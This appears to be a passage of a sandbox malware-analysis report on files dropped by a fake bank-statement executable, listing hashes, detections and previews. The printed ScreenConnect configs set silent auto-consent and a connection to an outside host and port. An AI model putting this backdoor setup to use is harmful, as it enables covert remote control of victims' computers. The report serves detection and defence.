                                                                    SHA-256:17377A52EEAE11E8EE01EB629D6A60C10015AD2BB8BC9768E5C8E4B6500A15ED
                                                                    SHA-512:3F23670D0BA150DE19A805DB6BEB6EED8538BBAD6FBE3CC21D17D738A43CF411C679A23CEA11549E69BE0321E672F740791D40E92498AEF9D1F8650743EE85EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: order-00908.exe, Detection: malicious, Browse
                                                                    • Filename: q1M9Xfi0yC.exe, Detection: malicious, Browse
                                                                    • Filename: iZRt9uAa2V.exe, Detection: malicious, Browse
                                                                    • Filename: q1M9Xfi0yC.exe, Detection: malicious, Browse
                                                                    • Filename: iZRt9uAa2V.exe, Detection: malicious, Browse
                                                                    • Filename: , Detection: malicious, Browse
                                                                    • Filename: Gcca4WygdZ.exe, Detection: malicious, Browse
                                                                    • Filename: l4MyhIt40P.exe, Detection: malicious, Browse
                                                                    • Filename: U01wqIX537.exe, Detection: malicious, Browse
                                                                    • Filename: 28unTKrjKS.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.B..........." ..0.................. ... ....... .......................`.......0....@.................................5...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H........................L................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~....%-.&~......\...s....%.....(...+(...+o....o....*....0..s.......~ .....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.....(!....5..............s"....=...*..0...........~....%-.&~......_...s#...%.....(...+..~....%-.&~......`...s%...%.....(...+.r9..
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):61952
                                                                    Entropy (8bit):6.0424578422545006
                                                                    Encrypted:false
                                                                    SSDEEP:1536:7Sx8zDzYn1DruJCelbgZfBQeV8lsNEbgO:7Sx8z/uNruJv9wQeVXK
                                                                    MD5:22AF3A23BD30484514CDACF67C5B3810
                                                                    SHA1:E92A4EAEE9D896964DE541CE2F01C2404B638258
                                                                    SHA-256:7C5442121DBA2A30AB9579EC08E111DED372CF9CF90FB3256F273980B975AFA9
                                                                    SHA-512:95E40B27E90FCE7CA85E76AFBBC16EB62B4BB977664702B987DE2EB2294E6FE9E6DF5610EC7B2362C2C68493313F30FBBCBD3446DBE8AE2FA47B89407F5D5936
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h............" ..0.............B.... ... ....... .......................`.......l....@.....................................O.... .......................@......D...8............................................ ............... ..H............text...h.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................!.......H........f................................................................(....*^.(.......|...%...}....*:.(......}....*:.(......}....*:.(......}....*.~)...%-.&~(.....f...s....%.)...(...+*vs....%.}M.........s....(....*....0...........s....}.....s....}...........}.......($.....}.....(....&.('..........s....o.....('...~*...%-.&~(.....g...s....%.*...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s;...}....... ..6........s....s;...}.....(%...($............o%........
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):95520
                                                                    Entropy (8bit):6.505299402844754
                                                                    Encrypted:false
                                                                    SSDEEP:1536:0g1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkg4T0HMc7Jxc:NhbNDxZGXfdHrX7rAc6myJkg4T0H/A
                                                                    MD5:DC615E9D8EC81CBF2E2452516373E5A0
                                                                    SHA1:EC83D37A4F45CAEB07B1605324D0315F959452E9
                                                                    SHA-256:E9AB064ED381C29A3930F75CA3E05605C6EE07F30A69C043F576A5461DE3BAFC
                                                                    SHA-512:82FE00447FB9785264DFB8032399ADF6D33D91D71058212D252742C9E5FD54F5A52F6BAF4FB05E95F9A4055057C60A33A7C1C642F18A6A4E045B49BE88FA5D9F
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@..................................t....@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):531456
                                                                    Entropy (8bit):6.031735419537473
                                                                    Encrypted:false
                                                                    SSDEEP:6144:ZPpB0+E5A976t5puf9NTh/k4dKRYJUYg7N+earZ5Ghfn55AJ6m/JaXAQKx4kEYYo:dpq+Ezuf9N0RYJZPUI6
                                                                    MD5:B319407E807BE1A49E366F7F8EA7EE2A
                                                                    SHA1:B12197A877FB7E33B1CB5BA11B0DA5CA706581BA
                                                                    SHA-256:761B7E50BAA229E8AFCD9A50990D7F776DDB5ED1EA5FBB131C802E57CF918742
                                                                    SHA-512:DC497643790DC608DECE9C8FE7264EFEDD13724BD24C9BF28A60D848B405FDDEFB8337A60F3F32BB91518910E02C7A2AAF29FC32F86A464DFCAFA365526BDB7F
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0............../... ...@....... ...............................8....@.................................1/..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................e/......H........2..(.............................................................{9...*..{:...*V.(;.....}9.....}:...*...0..A........ur.......4.,/(<....{9....{9...o=...,.(>....{:....{:...o?...*.*.*. ... )UU.Z(<....{9...o@...X )UU.Z(>....{:...oA...X*...0..b........r...p......%..{9......%qu....u...-.&.+...u...oB....%..{:......%qv....v...-.&.+...v...oB....(C...*..{D...*..{E...*V.(;.....}D.....}E...*.0..A........uw.......4.,/(<....{D....{D...o=...,.(>....{E....{E...o?...*.*.*. F.b# )UU.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1716224
                                                                    Entropy (8bit):6.635479721420864
                                                                    Encrypted:false
                                                                    SSDEEP:24576:ZSjm7Fj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUw:Sm7JkGYYpT0+TFiH7efP
                                                                    MD5:29454A0CB83F28C24805E9A70E53444A
                                                                    SHA1:334202965B07AB69F08B16FED0EE6C7274463556
                                                                    SHA-256:998CC3F9AF5BD41CCF0F9BE86192BBE20CDEC08A6FF73C1199E1364195A83E14
                                                                    SHA-512:62790920974A2F1B018D466AE3E3B5100006A3C8013F43BDB04AF7074CFE5D992CAAEB610DE2B1B72FF0E4ACF8762DB1513A4A0CF331F9A340AE0CE53C3BE895
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L............" ..0..(...........F... ...`....... ..............................lc....@..................................E..O....`.............................. E..8............................................ ............... ..H............text...(&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................E......H.......$...L...........p...0....D........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*f.{......(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L.......
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):61216
                                                                    Entropy (8bit):6.318400837211405
                                                                    Encrypted:false
                                                                    SSDEEP:1536:0Ai+pmi/djqbv8DtYQ4RE+TC3l/ibU37DIx4:0Upmi1YQb1l3X
                                                                    MD5:10DBA57F22A6AB4039330000570F39F8
                                                                    SHA1:B8B5C65A89256177DA802C4C9CBD11B013221730
                                                                    SHA-256:9BD8D15759F83D99EDD1F2617D59A94E1C2BB4BD7C4977958F5D5F22C5A7C469
                                                                    SHA-512:38230B63A4630145608F619D75CA3115C05AB0338FB57566E012DF1BD157123A670A37AE0FEA92351AB7352319A5AF29F9DB3F8BB14962F3F0DE3A4F5A5B754C
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."............"...0.............6.... ........@.. ....................... ............@.....................................O.......,............... )..........(...8............................................ ............... ..H............text...<.... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S...............................................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....("...*..0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o*...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):587040
                                                                    Entropy (8bit):6.166636022526366
                                                                    Encrypted:false
                                                                    SSDEEP:12288:npu96mzdjnwbrYQySjbs03fG+Yg2PgG7x:CpjpSjq77x
                                                                    MD5:5DEC65C4047DE914C78816B8663E3602
                                                                    SHA1:8807695EE8345E37EFEC43CBC0874277ED9B0A66
                                                                    SHA-256:71602F6B0B27C8B7D8AD624248E6126970939EFFDE785EC913ACE19052E9960E
                                                                    SHA-512:27B5DCB5B0AEADF246B91A173D06E5E8D6CF2CD19D86CA358E0A85B84CD9D8F2B26372EF34C3D427F57803D90F2E97CF59692C80C268A71865F08FC0E7CE42D1
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...twP..........."...0.................. ........@.. .......................@.......a....@.....................................O....................... )... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........7......................`.........................................{F...*..{G...*V.(H.....}F.....}G...*...0..A........u,.......4.,/(I....{F....{F...oJ...,.(K....{G....{G...oL...*.*.*. }.o )UU.Z(I....{F...oM...X )UU.Z(K....{G...oN...X*...0..b........r...p......%..{F......%q/..../...-.&.+.../...oO....%..{G......%q0....0...-.&.+...0...oO....(P...*..{Q...*..{R...*V.(H.....}Q.....}R...*.0..A........u1.......4.,/(I....{Q....{Q...oJ...,.(K....{R....{R...oL...*.*.*. 1.c. )UU.
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):764424
                                                                    Entropy (8bit):6.269502354769188
                                                                    Encrypted:false
                                                                    SSDEEP:12288:OQ+rYYCG4xWh6+/ZCXnZ9GTWGsP9fuApxEF:r+rYYCTMh6IZkkWNBzpGF
                                                                    MD5:F01A59C5CF7EC437097D414D7C6D59C4
                                                                    SHA1:9EA1C3FBF3B5ADBE5A23578DEA3B511D44E6A2DD
                                                                    SHA-256:62B405F32A43DA0C8E8ED14A58EC7B9B4422B154BFD4AED4F9BE5DE0BC6EB5E8
                                                                    SHA-512:587748AD4DD18677A3B7943EAB1C0F8E77FE50A45E17266BA9A0E1363EDA0FF1EABCF11884A5D608E23BAF86AF8F011DB745AD06BCDECDFD01C20430745FE4BB
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W................................3............................2..............Rich...........PE..d.....nc.........." ...!............................................................Z.....`.........................................`...t....................0...m.......(.......).. ...........................(....}..@............ ...............................text............................... ..`.rdata..8.... ......................@..@.data...`9....... ..................@....pdata...m...0...n..................@..@_RDATA..\............V..............@..@.reloc...).......*...X..............@..B........................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):81696
                                                                    Entropy (8bit):5.850192336318162
                                                                    Encrypted:false
                                                                    SSDEEP:1536:GxIh+Sflv4V/bBI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7xk7NxGC:Em9CukLdtkL
                                                                    MD5:C333D3A6EEB74E4D76C3B9E0F6BFD04C
                                                                    SHA1:A39E2643E8DBD2097829E0B08938726557CB8E36
                                                                    SHA-256:998D7A0CD6B1A837489E55E99CB992088B9FDE220A1025346A461849E1F50D22
                                                                    SHA-512:58CC7741EBE1AADA93FD82A3E0A571A9A1AA3E400C46E7CDDDEF876D74F4FBBCBAE4293AC556B3823E8DC977E7CE72337A16C2D48EAB0AA52B736412AE43C634
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..@..........B^... ...`....@.. .......................`.......<....@..................................]..O....`.. ............... )...@......<]..8............................................ ............... ..H............text...H>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B................#^......H........*...1...................\........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}C....s....}B...~@...%-.&~?.....<...s ...%.@.......?...s ........@...s!...}D......A...s"..........(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t..........o$.......o%.......
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):266
                                                                    Entropy (8bit):4.842791478883622
                                                                    Encrypted:false
                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):3498
                                                                    Entropy (8bit):4.767066972927559
                                                                    Encrypted:false
                                                                    SSDEEP:96:FOdHgHlHNH8HAH82HyHMHUHZHVHzH52H1HyHkHtHDH2xA2tP9oFHL:FOZDQ
                                                                    MD5:6C877186E0D2C6A1D80E8C7DEEC91A64
                                                                    SHA1:2C06DB283FB549342DBF98409A27112B998F80E1
                                                                    SHA-256:291EC4968B2634871DE8479A8740202AB56841E81A32547F0237F5D396BA0823
                                                                    SHA-512:970DA6BC4F51F6766FCCDDEA327EED3BF8D665080AC8504A36374403673935FD03CBA0E169DEEE01C3E8F4C246EE073D0D559D9B313E7C6471015C95C8178E78
                                                                    Malicious:false
                                                                    Preview:<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings>.. <setting name="AutoConsentIfUserProcessNotRunning" serializeAs="String">.. <value>true</value>.. </setting>.. <setting name="AccessAutoConsentIfUserProcessNotRunning" serializeAs="String">.. <value>true</value>.. </setting>.. <setting name="SupportAutoConsentIfUserProcessNotRunning" serializeAs="String">.. <value>true</value>.. </setting>.. <setting name="AutoConsentToBackstage" serializeAs="String">.. <value>true</value>.. </setting>.. </ScreenConnect.SystemSettings>.. <ScreenConnect.UserInterfaceSettings>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="A
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (457), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):947
                                                                    Entropy (8bit):5.805303025559156
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dL9hK6E4dl/kjua9hRuRA8ZjH4z/KbvH:chh7HHHUhRuRAU4z/Kbv
                                                                    MD5:247C11D52C5612A6AD017C4FEDB6536C
                                                                    SHA1:B38A9B8E04399CAF980F340026E56F5582799017
                                                                    SHA-256:0CE9A497E2A276071662BD3791848805E4F42D769B573EBEA14D776A4F2479A3
                                                                    SHA-512:D5B768CC8F36F87BFB5EBDB041BE797A2DF13F44E468A6A6FF207961384EE11123824198E13C91D73D568372670E902687949EAFF54BCA1B249C93F1A7701C0E
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=bw36back93.site&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQBVrCWSt%2b2cKthNAS8WCpzwBkW7gylKQJ6RDxIjHv%2fRvikga3OHVBUUk74eX5u2WDvyGlxXUsTAHstE3Rks8Zw%2f5nMdMDz%2ffz%2fdADWqNvA27WRDTbgEuKYVImg%2bRuQTeYBssAlSkC71PJ4gqNaRdbnySWnXqNuCohB8XKd6MUQapUfc4DXF0e7EWF1onYtP%2bZz6ui1%2fvm3P0miTphdoOYDPJyJmnFL6AS3%2bEi4fXJkHoPDDjsiShDMOBGrn%2bwsLLVTQZCpIQElO7sxadYkptz0t1JF7bRKqG2Z6vshgz%2fal71%2fFvdI1kgsL2h5jLyMZgmq6EW%2fOzhQCdP4oY8SDbMW0</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):735
                                                                    Entropy (8bit):4.453891178092255
                                                                    Encrypted:false
                                                                    SSDEEP:12:TMHdmGzVYuBk5CZOSh4ffz1Xn/Ifhg5WCOaOj0CqcNx6goqeUO/+gWV5xT:2doCZZIZApCdRC6w
                                                                    MD5:6642AD60E61C93D20F505969D496BD77
                                                                    SHA1:60913D8C8ABAC793F12ACDFF46D152B6AE38F814
                                                                    SHA-256:84780C2C971E3963E973755E073912B6B1C717CE0B7C02EE33A5B5FB42453626
                                                                    SHA-512:84591058A8D8E4C74947C68FDEB63C10C772C5192B6B6F9E40EC6FAFF4D1E63F88EDDE5D1DD54194650AB545F922FAD97DC9DBEA3A7B8ABEB00D51F3422100F0
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>..<configuration>.. <system.webServer>.. <rewrite>.. <rules>.. <rule name="HTTPS redirect" patternSyntax="Wildcard" stopProcessing="true">.. <match url="*" />.. <conditions logicalGrouping="MatchAll">.. <add input="{HTTPS}" pattern="off" />.. <add input="{REQUEST_URI}" pattern="*.well-known/acme-challenge/*" negate="true" />.. </conditions>.. <action type="Redirect" url="https:{HTTP_HOST}{REQUEST_URI}" redirectType="Found" />.. </rule>.. </rules>.. </rewrite>.. </system.webServer>..</configuration>
                                                                    Process:C:\Users\user\Desktop\2024-11 eStmt 5563019.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):226
                                                                    Entropy (8bit):5.360398796477698
                                                                    Encrypted:false
                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                    MD5:3A8957C6382192B71471BD14359D0B12
                                                                    SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                    SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                    SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):651
                                                                    Entropy (8bit):5.343677015075984
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                    MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                    SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                    SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                    SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..
                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):1042264
                                                                    Entropy (8bit):7.78315708392355
                                                                    Encrypted:false
                                                                    SSDEEP:24576:4UUGGTFhicvYqWsy0fN7RHK7Ll8koyNkoBXPtH:bGTHtJ17VKH5LpNB
                                                                    MD5:8D94C9F4C07B76B4E32DAFFCC51109DA
                                                                    SHA1:62E31A89C488D6745ABB72A3071F688FD6180D33
                                                                    SHA-256:2B35C0E4088B2A7728FA7BC6A5BFDEFED7665598DE6D49641FDF5D1F1271A4D7
                                                                    SHA-512:0092CBBD95777E6931864D61931EFDF3A349F79C575030CAD9A1771432F52E1BDC25D5640E2923D202C42C2CE242D00187486334A946E97319D48211233EB0AC
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):228
                                                                    Entropy (8bit):5.069688959232011
                                                                    Encrypted:false
                                                                    SSDEEP:6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
                                                                    MD5:EB99EE012EB63C162EEBC1DF3A15990B
                                                                    SHA1:D48FD3B3B942C754E3588D91920670C087FCE7E9
                                                                    SHA-256:C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
                                                                    SHA-512:455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
                                                                    Malicious:false
                                                                    Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):176128
                                                                    Entropy (8bit):5.775360792482692
                                                                    Encrypted:false
                                                                    SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                    MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                    SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                    SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
